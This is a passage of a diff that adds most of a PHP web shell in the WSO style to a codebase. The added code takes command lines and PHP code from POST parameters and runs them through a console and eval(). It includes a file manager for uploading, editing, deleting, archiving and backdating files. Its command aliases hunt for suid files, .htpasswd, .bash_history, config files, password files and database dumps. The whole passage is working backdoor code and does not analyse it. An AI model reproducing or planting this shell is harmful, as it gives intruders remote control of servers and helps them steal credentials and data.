+ | echo '<a href=# onclick="g(null,null,\'' . urlencode($_POST['p1']) . '\',\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> '; | ||
+ | echo '<br><br>'; | ||
+ | switch($_POST['p2']) { | ||
+ | case 'view': | ||
+ | echo '<pre class=ml1>'; | ||
+ | $fp = @fopen($_POST['p1'], 'r'); | ||
+ | if($fp) { | ||
+ | while( !@feof($fp) ) | ||
+ | echo htmlspecialchars(@fread($fp, 1024)); | ||
+ | @fclose($fp); | ||
+ | } | ||
+ | echo '</pre>'; | ||
+ | break; | ||
+ | case 'highlight': | ||
+ | if( @is_readable($_POST['p1']) ) { | ||
+ | echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">'; | ||
+ | $code = @highlight_file($_POST['p1'],true); | ||
+ | echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>'; | ||
+ | } | ||
+ | break; | ||
+ | case 'chmod': | ||
+ | if( !empty($_POST['p3']) ) { | ||
+ | $perms = 0; | ||
+ | for($i=strlen($_POST['p3'])-1;$i>=0;--$i) | ||
+ | $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1)); | ||
+ | if(!@chmod($_POST['p1'], $perms)) | ||
+ | echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>'; | ||
+ | } | ||
+ | clearstatcache(); | ||
+ | echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>'; | ||
+ | break; | ||
+ | case 'edit': | ||
+ | if( !is_writable($_POST['p1'])) { | ||
+ | echo 'File isn\'t writeable'; | ||
+ | break; | ||
+ | } | ||
+ | if( !empty($_POST['p3']) ) { | ||
+ | $time = @filemtime($_POST['p1']); | ||
+ | $_POST['p3'] = substr($_POST['p3'],1); | ||
+ | $fp = @fopen($_POST['p1'],"w"); | ||
+ | if($fp) { | ||
+ | @fwrite($fp,$_POST['p3']); | ||
+ | @fclose($fp); | ||
+ | echo 'Saved!<br><script>p3_="";</script>'; | ||
+ | @touch($_POST['p1'],$time,$time); | ||
+ | } | ||
+ | } | ||
+ | echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>'; | ||
+ | $fp = @fopen($_POST['p1'], 'r'); | ||
+ | if($fp) { | ||
+ | while( !@feof($fp) ) | ||
+ | echo htmlspecialchars(@fread($fp, 1024)); | ||
+ | @fclose($fp); | ||
+ | } | ||
+ | echo '</textarea><input type=submit value=">>"></form>'; | ||
+ | break; | ||
+ | case 'hexdump': | ||
+ | $c = @file_get_contents($_POST['p1']); | ||
+ | $n = 0; | ||
+ | $h = array('00000000<br>','',''); | ||
+ | $len = strlen($c); | ||
+ | for ($i=0; $i<$len; ++$i) { | ||
+ | $h[1] .= sprintf('%02X',ord($c[$i])).' '; | ||
+ | switch ( ord($c[$i]) ) { | ||
+ | case 0: $h[2] .= ' '; break; | ||
+ | case 9: $h[2] .= ' '; break; | ||
+ | case 10: $h[2] .= ' '; break; | ||
+ | case 13: $h[2] .= ' '; break; | ||
+ | default: $h[2] .= $c[$i]; break; | ||
+ | } | ||
+ | $n++; | ||
+ | if ($n == 32) { | ||
+ | $n = 0; | ||
+ | if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';} | ||
+ | $h[1] .= '<br>'; | ||
+ | $h[2] .= "\n"; | ||
+ | } | ||
+ | } | ||
+ | echo '<table cellspacing=1 cellpadding=5 bgcolor=#222><tr><td bgcolor=#1e252e><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#060a10><pre>'.$h[1].'</pre></td><td bgcolor=#1e252e><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>'; | ||
+ | break; | ||
+ | case 'rename': | ||
+ | if( !empty($_POST['p3']) ) { | ||
+ | if(!@rename($_POST['p1'], $_POST['p3'])) | ||
+ | echo 'Can\'t rename!<br>'; | ||
+ | else | ||
+ | die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>'); | ||
+ | } | ||
+ | echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>'; | ||
+ | break; | ||
+ | case 'touch': | ||
+ | if( !empty($_POST['p3']) ) { | ||
+ | $time = strtotime($_POST['p3']); | ||
+ | if($time) { | ||
+ | if(!touch($_POST['p1'],$time,$time)) | ||
+ | echo 'Fail!'; | ||
+ | else | ||
+ | echo 'Touched!'; | ||
+ | } else echo 'Bad time format!'; | ||
+ | } | ||
+ | clearstatcache(); | ||
+ | echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>'; | ||
+ | break; | ||
+ | } | ||
+ | echo '</div>'; | ||
+ | hardFooter(); | ||
+ | } | ||
+ | if($os == 'win') | ||
+ | $aliases = array( | ||
+ | "List Directory" => "dir", | ||
+ | "Find index.php in current dir" => "dir /s /w /b index.php", | ||
+ | "Find *config*.php in current dir" => "dir /s /w /b *config*.php", | ||
+ | "Show active connections" => "netstat -an", | ||
+ | "Show running services" => "net start", | ||
+ | "User accounts" => "net user", | ||
+ | "Show computers" => "net view", | ||
+ | "ARP Table" => "arp -a", | ||
+ | "IP Configuration" => "ipconfig /all" | ||
+ | ); | ||
+ | else | ||
+ | $aliases = array( | ||
+ | "List dir" => "ls -lha", | ||
+ | "list file attributes on a Linux second extended file system" => "lsattr -va", | ||
+ | "show opened ports" => "netstat -an | grep -i listen", | ||
+ | "process status" => "ps aux", | ||
+ | "Find" => "", | ||
+ | "find all suid files" => "find / -type f -perm -04000 -ls", | ||
+ | "find suid files in current dir" => "find . -type f -perm -04000 -ls", | ||
+ | "find all sgid files" => "find / -type f -perm -02000 -ls", | ||
+ | "find sgid files in current dir" => "find . -type f -perm -02000 -ls", | ||
+ | "find config.inc.php files" => "find / -type f -name config.inc.php", | ||
+ | "find config* files" => "find / -type f -name \"config*\"", | ||
+ | "find config* files in current dir" => "find . -type f -name \"config*\"", | ||
+ | "find all writable folders and files" => "find / -perm -2 -ls", | ||
+ | "find all writable folders and files in current dir" => "find . -perm -2 -ls", | ||
+ | "find all service.pwd files" => "find / -type f -name service.pwd", | ||
+ | "find service.pwd files in current dir" => "find . -type f -name service.pwd", | ||
+ | "find all .htpasswd files" => "find / -type f -name .htpasswd", | ||
+ | "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", | ||
+ | "find all .bash_history files" => "find / -type f -name .bash_history", | ||
+ | "find .bash_history files in current dir" => "find . -type f -name .bash_history", | ||
+ | "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", | ||
+ | "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", | ||
+ | "Locate" => "", | ||
+ | "locate httpd.conf files" => "locate httpd.conf", | ||
+ | "locate vhosts.conf files" => "locate vhosts.conf", | ||
+ | "locate proftpd.conf files" => "locate proftpd.conf", | ||
+ | "locate psybnc.conf files" => "locate psybnc.conf", | ||
+ | "locate my.conf files" => "locate my.conf", | ||
+ | "locate admin.php files" =>"locate admin.php", | ||
+ | "locate cfg.php files" => "locate cfg.php", | ||
+ | "locate conf.php files" => "locate conf.php", | ||
+ | "locate config.dat files" => "locate config.dat", | ||
+ | "locate config.php files" => "locate config.php", | ||
+ | "locate config.inc files" => "locate config.inc", | ||
+ | "locate config.inc.php" => "locate config.inc.php", | ||
+ | "locate config.default.php files" => "locate config.default.php", | ||
+ | "locate config* files " => "locate config", | ||
+ | "locate .conf files"=>"locate '.conf'", | ||
+ | "locate .pwd files" => "locate '.pwd'", | ||
+ | "locate .sql files" => "locate '.sql'", | ||
+ | "locate .htpasswd files" => "locate '.htpasswd'", | ||
+ | "locate .bash_history files" => "locate '.bash_history'", | ||
+ | "locate .mysql_history files" => "locate '.mysql_history'", | ||
+ | "locate .fetchmailrc files" => "locate '.fetchmailrc'", | ||
+ | "locate backup files" => "locate backup", | ||
+ | "locate dump files" => "locate dump", | ||
+ | "locate priv files" => "locate priv" | ||
+ | ); | ||
+ | function actionConsole() { | ||
+ | if(!empty($_POST['p1']) && !empty($_POST['p2'])) { | ||
+ | prototype(md5($_SERVER['HTTP_HOST']).'stderr_to_out', true); | ||
+ | $_POST['p1'] .= ' 2>&1'; | ||
+ | } elseif(!empty($_POST['p1'])) | ||
+ | prototype(md5($_SERVER['HTTP_HOST']).'stderr_to_out', 0); | ||
+ | if(isset($_POST['ajax'])) { | ||
+ | prototype(md5($_SERVER['HTTP_HOST']).'ajax', true); | ||
+ | ob_start(); | ||
+ | echo "d.cf.cmd.value='';\n"; | ||
+ | $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\'\0")); | ||
+ | if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) { | ||
+ | if(@chdir($match[1])) { | ||
+ | $GLOBALS['cwd'] = @getcwd(); | ||
+ | echo "c_='".$GLOBALS['cwd']."';"; | ||
+ | } | ||
+ | } | ||
+ | echo "d.cf.output.value+='".$temp."';"; | ||
+ | echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;"; | ||
+ | $temp = ob_get_clean(); | ||
+ | echo strlen($temp), "\n", $temp; | ||
+ | exit; | ||
+ | } | ||
+ | if(empty($_POST['ajax'])&&!empty($_POST['p1'])) | ||
+ | prototype(md5($_SERVER['HTTP_HOST']).'ajax', 0); | ||
+ | hardHeader(); | ||
+ | echo "<script> | ||
+ | if(window.Event) window.captureEvents(Event.KEYDOWN); | ||
+ | var cmds = new Array(''); | ||
+ | var cur = 0; | ||
+ | function kp(e) { | ||
+ | var n = (window.Event) ? e.which : e.keyCode; | ||
+ | if(n == 38) { | ||
+ | cur--; | ||
+ | if(cur>=0) | ||
+ | document.cf.cmd.value = cmds[cur]; | ||
+ | else | ||
+ | cur++; | ||
+ | } else if(n == 40) { | ||
+ | cur++; | ||
+ | if(cur < cmds.length) | ||
+ | document.cf.cmd.value = cmds[cur]; | ||
+ | else | ||
+ | cur--; | ||
+ | } | ||
+ | } | ||
+ | function add(cmd) { | ||
+ | cmds.pop(); | ||
+ | cmds.push(cmd); | ||
+ | cmds.push(''); | ||
+ | cur = cmds.length-1; | ||
+ | } | ||
+ | </script>"; | ||
+ | echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;"><select name=alias>'; | ||
+ | foreach($GLOBALS['aliases'] as $n => $v) { | ||
+ | if($v == '') { | ||
+ | echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>'; | ||
+ | continue; | ||
+ | } | ||
+ | echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>'; | ||
+ | } | ||
+ | |||
+ | echo '</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 '.(@$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX <input type=checkbox name=show_errors value=1 '.(!empty($_POST['p2'])||$_COOKIE[md5($_SERVER['HTTP_HOST']).'stderr_to_out']?'checked':'').'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>'; | ||
+ | if(!empty($_POST['p1'])) { | ||
+ | echo htmlspecialchars("$ ".$_POST['p1']."\n".ex($_POST['p1'])); | ||
+ | } | ||
+ | echo '</textarea><table style="border:1px solid #060a10;background-color:#060a10;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td style="padding-left:4px; width:13px;">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>'; | ||
+ | echo '</form></div><script>d.cf.cmd.focus();</script>'; | ||
+ | hardFooter(); | ||
+ | } | ||
+ | function actionPhp() { | ||
+ | if( isset($_POST['ajax']) ) { | ||
+ | $_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax'] = true; | ||
+ | ob_start(); | ||
+ | eval($_POST['p1']); | ||
+ | $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n"; | ||
+ | echo strlen($temp), "\n", $temp; | ||
+ | exit; | ||
+ | } | ||
+ | hardHeader(); | ||
+ | if( isset($_POST['p2']) && ($_POST['p2'] == 'info') ) { | ||
+ | echo '<h1>PHP info</h1><div class=content>'; | ||
+ | ob_start(); | ||
+ | phpinfo(); | ||
+ | $tmp = ob_get_clean(); | ||
+ | $tmp = preg_replace('!body {.*}!msiU','',$tmp); | ||
+ | $tmp = preg_replace('!a:\w+ {.*}!msiU','',$tmp); | ||
+ | $tmp = preg_replace('!h1!msiU','h2',$tmp); | ||
+ | $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp); | ||
+ | $tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU','',$tmp); | ||
+ | echo $tmp; | ||
+ | echo '</div><br>'; | ||
+ | } | ||
+ | if(empty($_POST['ajax'])&&!empty($_POST['p1'])) | ||
+ | $_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax'] = false; | ||
+ | echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);}else{g(null,null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">'; | ||
+ | echo ' <input type=checkbox name=ajax value=1 '.($_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>'; | ||
+ | if(!empty($_POST['p1'])) { | ||
+ | ob_start(); | ||
+ | eval($_POST['p1']); | ||
+ | echo htmlspecialchars(ob_get_clean()); | ||
+ | } | ||
+ | echo '</pre></div>'; | ||
+ | hardFooter(); | ||
+ | } | ||
+ | function actionFilesMan() { | ||
+ | if (!empty ($_COOKIE['f'])) | ||
+ | $_COOKIE['f'] = @unserialize($_COOKIE['f']); | ||
+ | |||
+ | if(!empty($_POST['p1'])) { | ||
+ | switch($_POST['p1']) { | ||
+ | case 'uploadFile': | ||
+ | if ( is_array($_FILES['f']['tmp_name']) ) { | ||
+ | foreach ( $_FILES['f']['tmp_name'] as $i => $tmpName ) { | ||
+ | if(!@move_uploaded_file($tmpName, $_FILES['f']['name'][$i])) { | ||
+ | echo "Can't upload file!"; | ||
+ | } | ||
+ | } | ||
+ | } | ||
+ | break; | ||
+ | case 'mkdir': | ||
+ | if(!@mkdir($_POST['p2'])) | ||
+ | echo "Can't create new dir"; | ||
+ | break; | ||
+ | case 'delete': | ||
+ | function deleteDir($path) { | ||
+ | $path = (substr($path,-1)=='/') ? $path:$path.'/'; | ||
+ | $dh = opendir($path); | ||
+ | while ( ($â = readdir($dh) ) !== false) { | ||
+ | $â = $path.$â; | ||
+ | if ( (basename($â) == "..") || (basename($â) == ".") ) | ||
+ | continue; | ||
+ | $type = filetype($â); | ||
+ | if ($type == "dir") | ||
+ | deleteDir($â); | ||
+ | else | ||
+ | @unlink($â); | ||
+ | } | ||
+ | closedir($dh); | ||
+ | @rmdir($path); | ||
+ | } | ||
+ | if(is_array(@$_POST['f'])) | ||
+ | foreach($_POST['f'] as $f) { | ||
+ | if($f == '..') | ||
+ | continue; | ||
+ | $f = urldecode($f); | ||
+ | if(is_dir($f)) | ||
+ | deleteDir($f); | ||
+ | else | ||
+ | @unlink($f); | ||
+ | } | ||
+ | break; | ||
+ | case 'paste': | ||
+ | if($_COOKIE['act'] == 'copy') { | ||
+ | function copy_paste($c,$s,$d){ | ||
+ | if(is_dir($c.$s)){ | ||
+ | mkdir($d.$s); | ||
+ | $h = @opendir($c.$s); | ||
+ | while (($f = @readdir($h)) !== false) | ||
+ | if (($f != ".") and ($f != "..")) | ||
+ | copy_paste($c.$s.'/',$f, $d.$s.'/'); | ||
+ | } elseif(is_file($c.$s)) | ||
+ | @copy($c.$s, $d.$s); | ||
+ | } | ||
+ | foreach($_COOKIE['f'] as $f) | ||
+ | copy_paste($_COOKIE['c'],$f, $GLOBALS['cwd']); | ||
+ | } elseif($_COOKIE['act'] == 'move') { | ||
+ | function move_paste($c,$s,$d){ | ||
+ | if(is_dir($c.$s)){ | ||
+ | mkdir($d.$s); | ||
+ | $h = @opendir($c.$s); | ||
+ | while (($f = @readdir($h)) !== false) | ||
+ | if (($f != ".") and ($f != "..")) | ||
+ | copy_paste($c.$s.'/',$f, $d.$s.'/'); | ||
+ | } elseif(@is_file($c.$s)) | ||
+ | @copy($c.$s, $d.$s); | ||
+ | } | ||
+ | foreach($_COOKIE['f'] as $f) | ||
+ | @rename($_COOKIE['c'].$f, $GLOBALS['cwd'].$f); | ||
+ | } elseif($_COOKIE['act'] == 'zip') { | ||
+ | if(class_exists('ZipArchive')) { | ||
+ | $zip = new ZipArchive(); | ||
+ | if ($zip->open($_POST['p2'], 1)) { | ||
+ | chdir($_COOKIE['c']); | ||
+ | foreach($_COOKIE['f'] as $f) { | ||
+ | if($f == '..') | ||
+ | continue; | ||
+ | if(@is_file($_COOKIE['c'].$f)) | ||
+ | $zip->addFile($_COOKIE['c'].$f, $f); | ||
+ | elseif(@is_dir($_COOKIE['c'].$f)) { | ||
+ | $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/', FilesystemIterator::SKIP_DOTS)); | ||
+ | foreach ($iterator as $key=>$value) { | ||
+ | $zip->addFile(realpath($key), $key); | ||
+ | } | ||
+ | } | ||
+ | } | ||
+ | chdir($GLOBALS['cwd']); | ||
+ | $zip->close(); | ||
+ | } | ||
+ | } | ||
+ | } elseif($_COOKIE['act'] == 'unzip') { | ||
+ | if(class_exists('ZipArchive')) { | ||
+ | $zip = new ZipArchive(); | ||
+ | foreach($_COOKIE['f'] as $f) { | ||
+ | if($zip->open($_COOKIE['c'].$f)) { | ||
+ | $zip->extractTo($GLOBALS['cwd']); | ||
+ | $zip->close(); | ||
+ | } | ||
+ | } | ||
+ | } | ||
+ | } elseif($_COOKIE['act'] == 'tar') { | ||
+ | chdir($_COOKIE['c']); | ||
+ | $_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']); | ||
+ | ex('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_COOKIE['f'])); | ||
+ | chdir($GLOBALS['cwd']); | ||
+ | } | ||
+ | unset($_COOKIE['f']); | ||
+ | setcookie('f', '', time() - 3600); | ||
+ | break; | ||
+ | default: | ||
+ | if(!empty($_POST['p1'])) { | ||
+ | prototype('act', $_POST['p1']); | ||
+ | prototype('f', serialize(@$_POST['f'])); | ||
+ | prototype('c', @$_POST['c']); | ||
+ | } | ||
+ | break; | ||
+ | } | ||
+ | } | ||
+ | hardHeader(); | ||
+ | echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>'; | ||
+ | $dirContent = hardScandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']); | ||
+ | if($dirContent === false) { echo 'Can\'t open this folder!';hardFooter(); return; } | ||
+ | global $sort; | ||
+ | $sort = array('name', 1); | ||
+ | if(!empty($_POST['p1'])) { | ||
+ | if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match)) | ||
+ | $sort = array($match[1], (int)$match[2]); | ||
+ | } | ||
+ | echo "<script> | ||
+ | function sa() { | ||
+ | for(i=0;i<d.files.elements.length;i++) | ||
+ | if(d.files.elements[i].type == 'checkbox') | ||
+ | d.files.elements[i].checked = d.files.elements[0].checked; | ||
+ | } | ||
+ | </script> | ||
+ | <table width='100%' class='main' cellspacing='0' cellpadding='2'> | ||
+ | <form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>"; | ||
+ | $dirs = $files = array(); | ||
+ | $n = count($dirContent); | ||
+ | for($i=0;$i<$n;$i++) { | ||
+ | $ow = @posix_getpwuid(@fileowner($dirContent[$i])); | ||
+ | $gr = @posix_getgrgid(@filegroup($dirContent[$i])); | ||
+ | $tmp = array('name' => $dirContent[$i], | ||
+ | 'path' => $GLOBALS['cwd'].$dirContent[$i], | ||
+ | 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])), | ||
+ | 'perms' => viewPermsColor($GLOBALS['cwd'] . $dirContent[$i]), | ||
+ | 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]), | ||
+ | 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]), | ||
+ | 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i]) | ||
+ | ); | ||
+ | if(@is_file($GLOBALS['cwd'] . $dirContent[$i])) | ||
+ | $files[] = array_merge($tmp, array('type' => 'file')); | ||
+ | elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i])) | ||
+ | $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path']))); | ||
+ | elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i])) | ||
+ | $dirs[] = array_merge($tmp, array('type' => 'dir')); | ||
+ | } | ||
+ | $GLOBALS['sort'] = $sort; | ||
+ | function cmp($a, $b) { | ||
+ | if($GLOBALS['sort'][0] != 'size') | ||
+ | return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1); | ||
+ | else | ||
+ | return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1); | ||
+ | } | ||
+ | usort($files, "cmp"); | ||
+ | usort($dirs, "cmp"); | ||
+ | $files = array_merge($dirs, $files); | ||
+ | $l = 0; | ||
+ | foreach($files as $f) { | ||
+ | echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" ' . (empty ($f['link']) ? '' : "title='{$f['link']}'") . '><b>[ ' . htmlspecialchars($f['name']) . ' ]</b>').'</a></td><td>'.(($f['type']=='file')?viewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms'] | ||
+ | .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>'; | ||
+ | $l = $l?0:1; | ||
+ | } | ||
+ | echo "<tr><td colspan=7> | ||
+ | <input type=hidden name=ne value=''> | ||
+ | <input type=hidden name=a value='FilesMan'> | ||
+ | <input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'> | ||
+ | <input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'')."'> | ||
+ | <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>"; | ||
+ | if(class_exists('ZipArchive')) | ||
+ | echo "<option value='zip'>+ zip</option><option value='unzip'>- zip</option>"; | ||
+ | echo "<option value='tar'>+ tar.gz</option>"; | ||
+ | if(!empty($_COOKIE['act']) && @count($_COOKIE['f'])) | ||
+ | echo "<option value='paste'>â³ Paste</option>"; | ||
+ | echo "</select> "; | ||
+ | if(!empty($_COOKIE['act']) && @count($_COOKIE['f']) && (($_COOKIE['act'] == 'zip') || ($_COOKIE['act'] == 'tar'))) | ||
+ | echo "file name: <input type=text name=p2 value='hard_" . date("Ymd_His") . "." . ($_COOKIE['act'] == 'zip'?'zip':'tar.gz') . "'> "; | ||
+ | echo "<input type='submit' value='>>'></td></tr></form></table></div>"; | ||
+ | hardFooter(); | ||
+ | } | ||
+ | function actionStringTools() { | ||
+ | if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}} | ||
+ | if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}} | ||
+ | if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}} | ||
+ | if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= sprintf('%02X',ord($p[$i]));return strtoupper($r);}} | ||
+ | if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}} | ||
+ | $stringTools = array( | ||
+ | 'Base64 encode' => 'base64_encode', | ||
+ | 'Base64 decode' => 'base64_decode', | ||
+ | 'Url encode' => 'urlencode', | ||
+ | 'Url decode' => 'urldecode', | ||
+ | 'Full urlencode' => 'full_urlencode', | ||
+ | 'md5 hash' => 'md5', | ||
+ | 'sha1 hash' => 'sha1', | ||
+ | 'crypt' => 'crypt', | ||
+ | 'CRC32' => 'crc32', | ||
+ | 'ASCII to HEX' => 'ascii2hex', | ||
+ | 'HEX to ASCII' => 'hex2ascii', | ||
+ | 'HEX to DEC' => 'hexdec', | ||
+ | 'HEX to BIN' => 'hex2bin', | ||
+ | 'DEC to HEX' => 'dechex', | ||
+ | 'DEC to BIN' => 'decbin', | ||
+ | 'BIN to HEX' => 'binhex', | ||
+ | 'BIN to DEC' => 'bindec', | ||
+ | 'String to lower case' => 'strtolower', | ||
+ | 'String to upper case' => 'strtoupper', | ||
+ | 'Htmlspecialchars' => 'htmlspecialchars', | ||
+ | 'String length' => 'strlen', | ||
+ | ); | ||
+ | if(isset($_POST['ajax'])) { | ||
+ | prototype(md5($_SERVER['HTTP_HOST']).'ajax', true); | ||
+ | ob_start(); | ||
+ | if(in_array($_POST['p1'], $stringTools)) | ||
+ | echo $_POST['p1']($_POST['p2']); | ||
+ | $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n"; | ||
+ | echo strlen($temp), "\n", $temp; | ||
+ | exit; | ||
+ | } | ||
+ | if(empty($_POST['ajax'])&&!empty($_POST['p1'])) | ||
+ | prototype(md5($_SERVER['HTTP_HOST']).'ajax', 0); | ||
+ | hardHeader(); | ||
+ | echo '<h1>String conversions</h1><div class=content>'; | ||
+ | echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>"; | ||
+ | foreach($stringTools as $k => $v) | ||
+ | echo "<option value='".htmlspecialchars($v)."'>".$k."</option>"; | ||
+ | echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".(@$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".(empty($_POST['p1'])?'':htmlspecialchars(@$_POST['p2']))."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>"; | ||
+ | if(!empty($_POST['p1'])) { | ||
+ | if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2'])); | ||
+ | } | ||
+ | echo"</pre></div><br><h1>Search files:</h1><div class=content> | ||
+ | <form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\"><table cellpadding='1' cellspacing='0' width='50%'> | ||
+ | <tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr> | ||
+ | <tr><td>Path:</td><td><input type='text' name='cwd' value='". htmlspecialchars($GLOBALS['cwd']) ."' style='width:100%'></td></tr> | ||
+ | <tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr> | ||
+ | <tr><td></td><td><input type='submit' value='>>'></td></tr> | ||
+ | </table></form>"; | ||
+ | function hardRecursiveGlob($path) { | ||
